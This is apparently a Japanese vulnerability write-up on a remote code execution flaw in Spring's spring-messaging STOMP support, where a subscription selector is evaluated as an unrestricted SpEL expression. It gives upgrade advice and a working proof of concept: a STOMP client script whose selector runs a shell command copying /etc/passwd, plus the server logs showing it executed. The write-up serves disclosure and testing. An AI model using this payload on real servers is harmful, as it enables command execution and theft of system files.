
昨日、Spring で1つのRCE脆弱性が公開されました。詳細は以下をご覧ください:
影響バージョン
この脆弱性は環境に依存しません。spring-messaging + websocket + STOMP を使用している場合は、速やかに最新バージョンにアップグレードしてください。SpringBoot を使用している場合は、2.0.1.RELEASE にアップグレードしてください。
簡単に言うと、StandardEvaluationContext の権限が大きすぎるため、任意の SpEL 式を実行できてしまいます。そのため、公式は Spring 5.0.5 以降で SimpleEvaluationContext を追加し、シンプルなデータバインディングを実現しつつ、柔軟性を維持しながらセキュリティ上のリスクをもたらさないようにしました。
spring-messaging は STOMP プロトコルをサポートしており、クライアントがメッセージをサブスクライブし、selector を使ってメッセージをフィルタリングできます。例:
selector = 'T(java.lang.Runtime).getRuntime().exec("cp /etc/passwd /tmp")'
stompClient = Stomp.client('ws://localhost:8080/hello')
stompClient.connect({}, function(frame) {
stompClient.subscribe('/topic/greetings', function() {}, {
"selector": selector
})
});
サブスクライブ時に、Spring はこのフィルターを保存し、クライアントがメッセージを受信した際にトリガーします。例:
2018-04-07 08:32:20 [clientInboundChannel-3] TRACE o.s.m.s.b.DefaultSubscriptionRegistry - Subscription selector: [T(java.lang.Runtime).getRuntime().exec("cp /etc/passwd /tmp")]
...
2018-04-07 08:32:21 [MessageBroker-2] DEBUG o.s.m.s.b.DefaultSubscriptionRegistry - Failed to evaluate selector: EL1001E: Type conversion problem, cannot convert from java.lang.UNIXProcess to boolean
PoC スクリーンショット

具体的な脆弱性の分析記事は後ほど公開します。
Spring Boot サーバーをコンパイルして起動します。
mvn clean package
java -jar target/spring-boot-websocket-1.0.jar
アクセス - 式を入力してテストします。
http://localhost:8080
